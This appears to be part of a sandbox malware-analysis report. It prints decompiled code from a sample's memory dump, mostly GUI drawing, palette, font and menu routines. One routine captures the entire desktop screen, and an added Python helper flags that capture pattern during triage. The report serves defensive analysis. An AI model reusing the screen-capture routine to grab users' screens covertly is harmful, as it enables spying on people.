                                                    • Instruction Fuzzy Hash: 3B510971740214AFDB40FF69DD82F9E37ACAF08714F54015AF904EB286CA78ED458B69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0043F740(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
                                                    				int _v8;
                                                    				int _v12;
                                                    				int _v16;
                                                    				char _v20;
                                                    				struct tagRECT _v36;
                                                    				signed int _t54;
                                                    				intOrPtr _t59;
                                                    				int _t61;
                                                    				void* _t63;
                                                    				void* _t66;
                                                    				void* _t82;
                                                    				int _t98;
                                                    				struct HDC__* _t99;
                                                    
                                                    				_t99 = __edx;
                                                    				_t82 = __eax;
                                                    				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
                                                    				_v16 = SaveDC(__edx);
                                                    				L004398B8(__edx, _a4, __ecx);
                                                    				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
                                                    				_t98 = 0;
                                                    				_v12 = 0;
                                                    				if((GetWindowLongA(E00441704(_t82), 0xffffffec) & 0x00000002) == 0) {
                                                    					_t54 = GetWindowLongA(E00441704(_t82), 0xfffffff0);
                                                    					__eflags = _t54 & 0x00800000;
                                                    					if((_t54 & 0x00800000) != 0) {
                                                    						_v12 = 3;
                                                    						_t98 = 0xa00f;
                                                    					}
                                                    				} else {
                                                    					_v12 = 0xa;
                                                    					_t98 = 0x200f;
                                                    				}
                                                    				if(_t98 != 0) {
                                                    					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
                                                    					DrawEdge(_t99,  &_v36, _v12, _t98);
                                                    					L004398B8(_t99, _v36.top, _v36.left);
                                                    					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
                                                    				}
                                                    				E0043C130(_t82, _t99, 0x14, 0);
                                                    				E0043C130(_t82, _t99, 0xf, 0);
                                                    				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
                                                    				if(_t59 == 0) {
                                                    					L12:
                                                    					_t61 = RestoreDC(_t99, _v16);
                                                    					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
                                                    					return _t61;
                                                    				} else {
                                                    					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
                                                    					if(_t63 < 0) {
                                                    						goto L12;
                                                    					}
                                                    					_v20 = _t63 + 1;
                                                    					_v8 = 0;
                                                    					do {
                                                    						_t66 = E0041AC6C( *((intOrPtr*)(_t82 + 0x19c)), _v8);
                                                    						_t107 =  *((char*)(_t66 + 0x57));
                                                    						if( *((char*)(_t66 + 0x57)) != 0) {
                                                    							E0043F740(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
                                                    						}
                                                    						_v8 = _v8 + 1;
                                                    						_t36 =  &_v20;
                                                    						 *_t36 = _v20 - 1;
                                                    					} while ( *_t36 != 0);
                                                    					goto L12;
                                                    				}
                                                    			}

                                                    APIs
                                                    • SaveDC.GDI32 ref: 0043F756
                                                      • Part of subcall function 004398B8: GetWindowOrgEx.GDI32(?), ref: 004398C6
                                                      • Part of subcall function 004398B8: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 004398DC
                                                    • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043F777
                                                    • GetWindowLongA.USER32 ref: 0043F78D
                                                    • GetWindowLongA.USER32 ref: 0043F7AF
                                                    • SetRect.USER32 ref: 0043F7DB
                                                    • DrawEdge.USER32(?,?,?,00000000), ref: 0043F7EA
                                                    • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043F80F
                                                    • RestoreDC.GDI32(?,?), ref: 0043F880
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                                    • String ID:
                                                    • API String ID: 2976466617-0
                                                    • Opcode ID: c79d6f2aaaf99a46f52f279e4e3e1293840bbc328cda2cdb7d7d29bc77371f5b
                                                    • Instruction ID: 5550dfeaeb93720f68ac000546fd20648b8bffa49c9e266dbbfe82f03f6cc12f
                                                    • Opcode Fuzzy Hash: c79d6f2aaaf99a46f52f279e4e3e1293840bbc328cda2cdb7d7d29bc77371f5b
                                                    • Instruction Fuzzy Hash: C2416671F002046BDB04EA99CC81FDE77A9AF49304F10416AF904EB396D778ED0587A9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E004751FC() {
                                                    				void* _v20;
                                                    				void* _v24;
                                                    				intOrPtr _v28;
                                                    				intOrPtr _v32;
                                                    				intOrPtr _v36;
                                                    				intOrPtr _v40;
                                                    				void* __ebp;
                                                    				intOrPtr* _t45;
                                                    				LOGPALETTE* _t57;
                                                    				struct HDC__* _t58;
                                                    				WORD _t59;
                                                    				struct tagRECT* _t60;
                                                    
                                                    				GetWindowRect(GetDesktopWindow(), _t60); // bounds of the whole desktop; its width/height feed the BitBlt below
                                                    				_t45 = L00429914(1);
                                                    				 *((intOrPtr*)( *_t45 + 0x40))();
                                                    				 *((intOrPtr*)( *_t45 + 0x34))();
                                                    				_t58 = GetDC(0);
                                                    				if((GetDeviceCaps(_t58, 0x26) & 0x00000100) == 0x100) { // GetDeviceCaps(RASTERCAPS) & RC_PALETTE: palettised display, so copy the system palette first
                                                    					_t57 = E0040275C(0x404);
                                                    					E004032B4(_t57, 0x404);
                                                    					_t57->palVersion = 0x300; // LOGPALETTE.palVersion is always 0x300
                                                    					_t6 =  &(_t57->palPalEntry); // 0x4
                                                    					_t59 = GetSystemPaletteEntries(_t58, 0, 0x100, _t6);
                                                    					_t57->palNumEntries = _t59;
                                                    					if(_t59 != 0) {
                                                    						CreatePalette(_t57);
                                                    						 *((intOrPtr*)( *_t45 + 0x38))();
                                                    					}
                                                    					E0040277C(_t57);
                                                    				}
                                                    				BitBlt(L00425C68(L00429EDC(_t45)), 0, 0, _v32 - _v40, _v28 - _v36, _t58, 0, 0, 0xcc0020); // 0xCC0020 = SRCCOPY: copies the desktop DC (GetDC(0)) into the destination DC at full screen size, i.e. a screen capture
                                                    				ReleaseDC(0, _t58);
                                                    				return _t45;
                                                    			}

                                                    Statement addresses (the report's per-line address column for E004751FC): 0x0047520a 0x0047521b 0x00475228 0x00475237 0x00475241 0x00475255 0x00475261 0x0047526c 0x00475271 0x00475276 0x00475287 0x00475289 0x00475290 0x00475293 0x0047529e 0x0047529e 0x004752a3 0x004752a3 0x004752d5 0x004752dd 0x004752eb

                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 00475204
                                                    • GetWindowRect.USER32 ref: 0047520A
                                                    • GetDC.USER32(00000000), ref: 0047523C
                                                    • GetDeviceCaps.GDI32(00000000,00000026), ref: 00475246
                                                    • GetSystemPaletteEntries.GDI32(00000000,00000000,00000100,00000004), ref: 00475282
                                                    • CreatePalette.GDI32(00000000), ref: 00475293
                                                    • BitBlt.GDI32(00000000,00000000,00000000,00CC0020,00CC0020,00000000,00000000,00000000,00CC0020), ref: 004752D5
                                                    • ReleaseDC.USER32 ref: 004752DD
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: PaletteWindow$CapsCreateDesktopDeviceEntriesRectReleaseSystem
                                                    • String ID:
                                                    • API String ID: 3213150747-0
                                                    • Opcode ID: 94de3cdaf569bc05093e076c07835454fccb335de717688e3b24cf6573941b2d
                                                    • Instruction ID: cf87fae2104b332fff4ea17414f726447bb42f5c33e6fb1eed0e3625bbc1caf8
                                                    • Opcode Fuzzy Hash: 94de3cdaf569bc05093e076c07835454fccb335de717688e3b24cf6573941b2d
                                                    • Instruction Fuzzy Hash: 222162317442016FD311FA79CC86F5E77989F89314F50453DFA48EB2C2CA79AC0587AA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
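A triage helper for the "APIs" lists in this report, added here as an example and not part of the Joe Sandbox output or of the sample's own code: it parses the bullet lines exactly as they are printed above and flags the call combination in E004751FC (GetDesktopWindow, GetDC(0), BitBlt with raster op 0x00CC0020 = SRCCOPY) as a desktop screen capture, while the palette, menu and font-metric routines in the neighbouring records come out as GUI runtime noise. The rule names, severities and the small constants table are this example's own choices; the two embedded sample lists are copied from the E004751FC and E004265A0 records on this page.

```python
"""Triage helper for the per-function 'APIs' lists in this report.

Added example; not part of the Joe Sandbox report or the analysed sample.
It parses the bullet lines as printed on the page and flags the Win32 call
combinations worth an analyst's time. Rule names and severities are this
example's own choices, not a Joe Sandbox feature.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One bullet per API call, in the three shapes the report prints:
#   • GetDC.USER32(00000000), ref: 0047523C
#   • GetDesktopWindow.USER32 ref: 00475204
#   • Part of subcall function 00424E24: CreateFontIndirectA.GDI32(?), ref: 00424F62
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

SRCCOPY = 0x00CC0020  # BitBlt raster op (wingdi.h)
DEVICECAPS_INDEX = {0x26: "RASTERCAPS", 0x68: "SIZEPALETTE"}  # GetDeviceCaps indices (wingdi.h)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int
    via_subcall: Optional[str] = None  # set when the report marks the call as part of a subcall


def parse_api_list(text: str) -> List[ApiCall]:
    """Parse the bullets of one function record; lines that are not API bullets are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
        calls.append(ApiCall(m["name"], m["module"].upper(), args, int(m["ref"], 16), m["sub"]))
    return calls


def _hex_arg(text: str) -> Optional[int]:
    """The report prints unresolved arguments as '?'; only literal hex values are compared."""
    try:
        return int(text, 16)
    except ValueError:
        return None


def _has_arg(call: ApiCall, value: int) -> bool:
    return any(_hex_arg(a) == value for a in call.args)


def describe(call: ApiCall) -> str:
    """Render a call with the constants an analyst would otherwise look up by hand."""
    if call.name == "GetDeviceCaps" and len(call.args) == 2:
        idx = _hex_arg(call.args[1])
        if idx is not None:
            return f"GetDeviceCaps({DEVICECAPS_INDEX.get(idx, hex(idx))})"
    if call.name == "BitBlt" and _has_arg(call, SRCCOPY):
        return "BitBlt(rop=SRCCOPY)"
    return f"{call.name}({', '.join(call.args)})"


def classify(calls: List[ApiCall]) -> List[Tuple[str, str]]:
    """Return (finding, severity) pairs for one function's API list."""
    names = {c.name for c in calls}
    findings = []
    # GetDC(NULL) or GetDesktopWindow() gives a DC covering the whole screen.
    desktop_dc = "GetDesktopWindow" in names or any(
        c.name == "GetDC" and _has_arg(c, 0) for c in calls)
    if "BitBlt" in names and desktop_dc:
        rop_srccopy = any(c.name == "BitBlt" and _has_arg(c, SRCCOPY) for c in calls)
        findings.append(("screen-capture", "high" if rop_srccopy else "medium"))
    elif "GetSystemPaletteEntries" in names:
        findings.append(("palette-handling (GUI runtime, low triage value)", "info"))
    if names & {"InsertMenuA", "InsertMenuItemA"}:
        findings.append(("menu-construction (GUI runtime, low triage value)", "info"))
    if names & {"CreateFontIndirectA", "GetTextMetricsA"}:
        findings.append(("font-metrics (GUI runtime, low triage value)", "info"))
    return findings


# Sample input copied from the E004751FC and E004265A0 records of this report.
SCREEN_CAPTURE_APIS = """\
• GetDesktopWindow.USER32 ref: 00475204
• GetWindowRect.USER32 ref: 0047520A
• GetDC.USER32(00000000), ref: 0047523C
• GetDeviceCaps.GDI32(00000000,00000026), ref: 00475246
• GetSystemPaletteEntries.GDI32(00000000,00000000,00000100,00000004), ref: 00475282
• CreatePalette.GDI32(00000000), ref: 00475293
• BitBlt.GDI32(00000000,00000000,00000000,00CC0020,00CC0020,00000000,00000000,00000000,00CC0020), ref: 004752D5
• ReleaseDC.USER32 ref: 004752DD
"""

PALETTE_APIS = """\
• GetDC.USER32(00000000), ref: 004265CE
• GetDeviceCaps.GDI32(?,00000068), ref: 004265EA
• GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 00426609
• GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 0042662D
• ReleaseDC.USER32 ref: 00426697
"""

if __name__ == "__main__":
    for label, text in (("E004751FC", SCREEN_CAPTURE_APIS), ("E004265A0", PALETTE_APIS)):
        calls = parse_api_list(text)
        print(label, [describe(c) for c in calls], classify(calls))
```

Run against the two records, the helper reports E004751FC as `screen-capture / high` and E004265A0 as palette handling only; the same parser can be pointed at any other record on the page, and the rule table is where an analyst would add further combinations (keyboard hooks, clipboard access and so on) as they appear in a report.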

                                                    C-Code - Quality: 70%
                                                    			E004265A0(void* __ebx) {
                                                    				struct HDC__* _v8;
                                                    				struct tagPALETTEENTRY _v1000;
                                                    				struct tagPALETTEENTRY _v1004;
                                                    				struct tagPALETTEENTRY _v1032;
                                                    				signed int _v1034;
                                                    				short _v1036;
                                                    				void* _t24;
                                                    				int _t53;
                                                    				intOrPtr _t60;
                                                    				void* _t62;
                                                    				void* _t63;
                                                    
                                                    				_t62 = _t63;
                                                    				_v1036 = 0x300; // LOGPALETTE.palVersion
                                                    				_v1034 = 0x10; // palNumEntries = 16
                                                    				E004029DC(_t24, 0x40,  &_v1032);
                                                    				_v8 = GetDC(0);
                                                    				_push(_t62);
                                                    				_push(0x42669d);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t63 + 0xfffffbf8;
                                                    				_t53 = GetDeviceCaps(_v8, 0x68); // GetDeviceCaps(SIZEPALETTE): number of entries in the system palette
                                                    				if(_t53 >= 0x10) {
                                                    					GetSystemPaletteEntries(_v8, 0, 8,  &_v1032);
                                                    					if(_v1004 != 0xc0c0c0) {
                                                    						GetSystemPaletteEntries(_v8, _t53 - 8, 8, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x424);
                                                    					} else {
                                                    						GetSystemPaletteEntries(_v8, _t53 - 8, 1,  &_v1004);
                                                    						GetSystemPaletteEntries(_v8, _t53 - 7, 7, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x420);
                                                    						GetSystemPaletteEntries(_v8, 7, 1,  &_v1000);
                                                    					}
                                                    				}
                                                    				_pop(_t60);
                                                    				 *[fs:eax] = _t60;
                                                    				_push(0x4266a4);
                                                    				return ReleaseDC(0, _v8);
                                                    			}

                                                    Statement addresses (the report's per-line address column for E004265A0): 0x004265a1 0x004265aa 0x004265b3 0x004265c7 0x004265d3 0x004265d8 0x004265d9 0x004265de 0x004265e1 0x004265ef 0x004265f4 0x00426609 0x00426618 0x0042667f 0x0042661a 0x0042662d 0x0042664b 0x0042665f 0x0042665f 0x00426618 0x00426686 0x00426689 0x0042668c 0x0042669c

                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 004265CE
                                                    • GetDeviceCaps.GDI32(?,00000068), ref: 004265EA
                                                    • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 00426609
                                                    • GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 0042662D
                                                    • GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 0042664B
                                                    • GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 0042665F
                                                    • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0042667F
                                                    • ReleaseDC.USER32 ref: 00426697
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EntriesPaletteSystem$CapsDeviceRelease
                                                    • String ID:
                                                    • API String ID: 1781840570-0
                                                    • Opcode ID: 0eb73cb19fcbebc97ca0d3b42b0b75fc3d023da046d704aae5c56db498695ba3
                                                    • Instruction ID: 805600ea143b9581a1e299db5fe5220b0691e616ed58bf122693d2d560596f25
                                                    • Opcode Fuzzy Hash: 0eb73cb19fcbebc97ca0d3b42b0b75fc3d023da046d704aae5c56db498695ba3
                                                    • Instruction Fuzzy Hash: 592174B1A04218FAEB10DBA5CD85F9E72ACEB08704F5104A6FB04F61C1D678AE54DB29
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00434530(void* __eax, void* __edx, void* __ebp, void* __eflags) {
                                                    				struct tagTEXTMETRICA _v84;
                                                    				signed int _v100;
                                                    				void* __ebx;
                                                    				void* _t15;
                                                    				char* _t20;
                                                    				signed int _t21;
                                                    				signed int _t23;
                                                    				struct HDC__* _t29;
                                                    				signed int _t30;
                                                    				signed int _t32;
                                                    				signed int _t33;
                                                    				void* _t34;
                                                    				void* _t40;
                                                    				struct tagTEXTMETRICA* _t42;
                                                    
                                                    				_t40 = __eax;
                                                    				_t29 = GetDC(0);
                                                    				GetTextMetricsA(_t29, _t42);
                                                    				_t15 = SelectObject(_t29, E00424E24( *((intOrPtr*)(_t40 + 0x68)), _t29, _t34));
                                                    				GetTextMetricsA(_t29,  &_v84);
                                                    				SelectObject(_t29, _t15);
                                                    				ReleaseDC(0, _t29);
                                                    				_t20 =  *0x49da40; // 0x49eb1c
                                                    				if( *_t20 == 0) {
                                                    					_t30 = _t42->tmHeight;
                                                    					_t21 = _v100;
                                                    					if(_t30 > _t21) {
                                                    						_t30 = _t21;
                                                    					}
                                                    					_t23 = GetSystemMetrics(6) << 2; // SM_CYBORDER * 4
                                                    					if(_t30 < 0) {
                                                    						_t30 = _t30 + 3;
                                                    					}
                                                    					_t32 = _t23 + (_t30 >> 2);
                                                    				} else {
                                                    					if( *((char*)(_t40 + 0x1a5)) == 0) {
                                                    						_t33 = 6;
                                                    					} else {
                                                    						_t33 = 8;
                                                    					}
                                                    					_t32 = GetSystemMetrics(6) * _t33; // SM_CYBORDER * 6 or * 8
                                                    				}
                                                    				return E0043A75C(_t40, _v100 + _t32);
                                                    			}

                                                    Statement addresses (the report's per-line address column for E00434530): 0x00434536 0x0043453f 0x00434543 0x00434552 0x0043455f 0x00434566 0x0043456e 0x00434573 0x0043457b 0x0043459f 0x004345a2 0x004345a8 0x004345aa 0x004345aa 0x004345b3 0x004345b8 0x004345ba 0x004345ba 0x004345c2 0x0043457d 0x00434584 0x0043458d 0x00434586 0x00434586 0x00434586 0x0043459b 0x0043459b 0x004345d7

                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 0043453A
                                                    • GetTextMetricsA.GDI32(00000000), ref: 00434543
                                                      • Part of subcall function 00424E24: CreateFontIndirectA.GDI32(?), ref: 00424F62
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00434552
                                                    • GetTextMetricsA.GDI32(00000000,?), ref: 0043455F
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00434566
                                                    • ReleaseDC.USER32 ref: 0043456E
                                                    • GetSystemMetrics.USER32 ref: 00434594
                                                    • GetSystemMetrics.USER32 ref: 004345AE
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
                                                    • String ID:
                                                    • API String ID: 1583807278-0
                                                    • Opcode ID: ca349bb18a4b4453b776530d288914abec228c4fb22e44048b16066f4dcf4a7d
                                                    • Instruction ID: 5c0f3d8754ac9f53a552d955726f62212e9f387cfb0fc4aa99143b90913ccd9a
                                                    • Opcode Fuzzy Hash: ca349bb18a4b4453b776530d288914abec228c4fb22e44048b16066f4dcf4a7d
                                                    • Instruction Fuzzy Hash: 2111A951F083003BE31066798CC2B6B65C8DB99358F84183AF646D73D2D57CBC41836B
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 84%
                                                    			E0044A960(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
                                                    				char _v5;
                                                    				char _v12;
                                                    				char _v13;
                                                    				struct tagMENUITEMINFOA _v61;
                                                    				char _v68;
                                                    				intOrPtr _t103;
                                                    				CHAR* _t109;
                                                    				char _t115;
                                                    				short _t149;
                                                    				void* _t154;
                                                    				intOrPtr _t161;
                                                    				intOrPtr _t184;
                                                    				struct HMENU__* _t186;
                                                    				int _t190;
                                                    				void* _t192;
                                                    				intOrPtr _t193;
                                                    				void* _t196;
                                                    				void* _t205;
                                                    
                                                    				_t155 = __ecx;
                                                    				_push(__esi);
                                                    				_push(__edi);
                                                    				_v68 = 0;
                                                    				_v12 = 0;
                                                    				_v5 = __ecx;
                                                    				_t186 = __edx;
                                                    				_t154 = __eax;
                                                    				_push(_t196);
                                                    				_push(0x44abbb);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t196 + 0xffffffc0;
                                                    				if( *((char*)(__eax + 0x3e)) == 0) {
                                                    					L22:
                                                    					_pop(_t161);
                                                    					 *[fs:eax] = _t161;
                                                    					_push(0x44abc2);
                                                    					E004049C0( &_v68);
                                                    					return E004049C0( &_v12);
                                                    				}
                                                    				E00404A58( &_v12,  *((intOrPtr*)(__eax + 0x30)));
                                                    				if(E0044C8DC(_t154) <= 0) {
                                                    					__eflags =  *((short*)(_t154 + 0x60));
                                                    					if( *((short*)(_t154 + 0x60)) == 0) {
                                                    						L8:
                                                    						if((GetVersion() & 0x000000ff) < 4) { // Windows major version below 4: legacy path using InsertMenuA instead of InsertMenuItemA
                                                    							_t190 =  *(0x49bdf0 + ((E00404DCC( *((intOrPtr*)(_t154 + 0x30)), 0x44abe0) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x0049BDE4 |  *0x0049BDD4 |  *0x0049BDDC | 0x00000400;
                                                    							_t103 = E0044C8DC(_t154);
                                                    							__eflags = _t103;
                                                    							if(_t103 <= 0) {
                                                    								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E00404E80(_v12));
                                                    							} else {
                                                    								_t109 = E00404E80( *((intOrPtr*)(_t154 + 0x30)));
                                                    								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E0044AE70(_t154, _t186, _t190), _t109);
                                                    							}
                                                    							goto L22;
                                                    						}
                                                    						_v61.cbSize = 0x2c; // 44 = sizeof(MENUITEMINFOA) without the trailing hbmpItem member
                                                    						_v61.fMask = 0x3f; // MIIM_STATE | MIIM_ID | MIIM_SUBMENU | MIIM_CHECKMARKS | MIIM_TYPE | MIIM_DATA
                                                    						_t192 = E0044CE98(_t154);
                                                    						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E0044C4B4(_t154) == 0) {
                                                    							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
                                                    								L14:
                                                    								_t115 = 0;
                                                    								goto L16;
                                                    							}
                                                    							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
                                                    							if(_t205 == 0) {
                                                    								goto L15;
                                                    							}
                                                    							goto L14;
                                                    						} else {
                                                    							L15:
                                                    							_t115 = 1;
                                                    							L16:
                                                    							_v13 = _t115;
                                                    							_v61.fType =  *(0x49be24 + ((E00404DCC( *((intOrPtr*)(_t154 + 0x30)), 0x44abe0) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x0049BE1C |  *0x0049BDF8 |  *0x0049BE2C |  *0x0049BE34;
                                                    							_v61.fState =  *0x0049BE04 |  *0x0049BE14 |  *0x0049BE0C;
                                                    							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
                                                    							_v61.hSubMenu = 0;
                                                    							_v61.hbmpChecked = 0;
                                                    							_v61.hbmpUnchecked = 0;
                                                    							_v61.dwTypeData = E00404E80(_v12);
                                                    							if(E0044C8DC(_t154) > 0) {
                                                    								_v61.hSubMenu = E0044AE70(_t154, _t186, _t192);
                                                    							}
                                                    							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
                                                    							goto L22;
                                                    						}
                                                    					}
                                                    					_t193 =  *((intOrPtr*)(_t154 + 0x64));
                                                    					__eflags = _t193;
                                                    					if(_t193 == 0) {
                                                    						L7:
                                                    						_push(_v12);
                                                    						_push(0x44abd4);
                                                    						L00449FC4( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
                                                    						_push(_v68);
                                                    						E00404D40();
                                                    						goto L8;
                                                    					}
                                                    					__eflags =  *((intOrPtr*)(_t193 + 0x64));
                                                    					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
                                                    						goto L7;
                                                    					}
                                                    					_t184 =  *0x449854; // 0x4498a0
                                                    					_t149 = L00403D78( *((intOrPtr*)(_t193 + 4)), _t184);
                                                    					__eflags = _t149;
                                                    					if(_t149 != 0) {
                                                    						goto L8;
                                                    					}
                                                    					goto L7;
                                                    				}
                                                    				_v61.hSubMenu = E0044AE70(_t154, _t186, __esi);
                                                    				goto L8;
                                                    			}





















                                                    0x0044a960
                                                    0x0044a967
                                                    0x0044a968
                                                    0x0044a96b
                                                    0x0044a96e
                                                    0x0044a971
                                                    0x0044a974
                                                    0x0044a976
                                                    0x0044a97a
                                                    0x0044a97b
                                                    0x0044a980
                                                    0x0044a983
                                                    0x0044a98a
                                                    0x0044ab9d
                                                    0x0044ab9f
                                                    0x0044aba2
                                                    0x0044aba5
                                                    0x0044abad
                                                    0x0044abba
                                                    0x0044abba
                                                    0x0044a996
                                                    0x0044a9a4
                                                    0x0044a9b2
                                                    0x0044a9b7
                                                    0x0044a9fc
                                                    0x0044aa0a
                                                    0x0044ab56
                                                    0x0044ab5e
                                                    0x0044ab63
                                                    0x0044ab65
                                                    0x0044ab98
                                                    0x0044ab67
                                                    0x0044ab6a
                                                    0x0044ab7f
                                                    0x0044ab7f
                                                    0x00000000
                                                    0x0044ab65
                                                    0x0044aa10
                                                    0x0044aa17
                                                    0x0044aa25
                                                    0x0044aa29
                                                    0x0044aa40
                                                    0x0044aa4e
                                                    0x0044aa4e
                                                    0x00000000
                                                    0x0044aa4e
                                                    0x0044aa4a
                                                    0x0044aa4c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0044aa52
                                                    0x0044aa52
                                                    0x0044aa52
                                                    0x0044aa54
                                                    0x0044aa54
                                                    0x0044aaa3
                                                    0x0044aaca
                                                    0x0044aad1
                                                    0x0044aad6
                                                    0x0044aadb
                                                    0x0044aae0
                                                    0x0044aaeb
                                                    0x0044aaf7
                                                    0x0044ab00
                                                    0x0044ab00
                                                    0x0044ab0c
                                                    0x00000000
                                                    0x0044ab0c
                                                    0x0044aa29
                                                    0x0044a9b9
                                                    0x0044a9bc
                                                    0x0044a9be
                                                    0x0044a9d8
                                                    0x0044a9d8
                                                    0x0044a9db
                                                    0x0044a9e7
                                                    0x0044a9ec
                                                    0x0044a9f7
                                                    0x00000000
                                                    0x0044a9f7
                                                    0x0044a9c0
                                                    0x0044a9c4
                                                    0x00000000
                                                    0x00000000
                                                    0x0044a9c9
                                                    0x0044a9cf
                                                    0x0044a9d4
                                                    0x0044a9d6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0044a9d6
                                                    0x0044a9ad
                                                    0x00000000

                                                    APIs
                                                    • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 0044AB0C
                                                    • GetVersion.KERNEL32(00000000,0044ABBB), ref: 0044A9FC
                                                      • Part of subcall function 0044AE70: CreatePopupMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE8B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Menu$CreateInsertItemPopupVersion
                                                    • String ID: ,$?
                                                    • API String ID: 133695497-2308483597
                                                    • Opcode ID: ce329fbcfb68304f05595de6c1e6c5ccc5445e86f25c9360cd087edaa36d7743
                                                    • Instruction ID: 398804152d519dd2ee62b9937964e6d4d0d5c4b5bb315d29c079f0e0da2fd4ec
                                                    • Opcode Fuzzy Hash: ce329fbcfb68304f05595de6c1e6c5ccc5445e86f25c9360cd087edaa36d7743
                                                    • Instruction Fuzzy Hash: 4861E270A042449BEB10EF79D881A9A77FAFF09304F04457AEA44E7356E738EC55C749
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
